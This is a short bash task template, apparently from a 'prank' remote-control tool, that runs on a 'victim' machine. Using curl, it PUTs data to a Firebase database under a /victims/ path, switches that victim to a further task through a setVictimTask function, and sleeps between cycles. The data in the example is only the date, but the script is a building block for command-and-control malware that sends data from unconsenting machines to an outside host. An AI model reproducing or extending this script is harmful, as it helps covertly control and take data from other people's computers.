#!/usr/bin/env bash
# REST API
# https://firebase.google.com/docs/reference/rest/database/

# Get the location of this script.
SCRIPTDIR=$( cd "$( dirname "${BASH_SOURCE[0]}" )" && pwd )

# Define the task ID
thisTaskID="cycle1"

# Get some default functions and variables from the deployment
source "$SCRIPTDIR/deploy"


###############################################################################

# Get the program parameters.

victim="$1"
rootIteration="$2"

###############################################################################

# Your own code

# Always write data to this tasks location.
#e.g.

result=`date`
curl -X PUT -d "{\"df_h\" : \"$result\" }" "https://${firebaseProject}.firebaseio.com/victims/$victim/$thisTaskID.json"

#If you want to swap to another task, you can do it like so:
setVictimTask "$victim" "cycle2"

###############################################################################

#Finally, you should sleep as well. Try not to use the computer's resources too much,
# It is only a prank, after all.

sleep 60
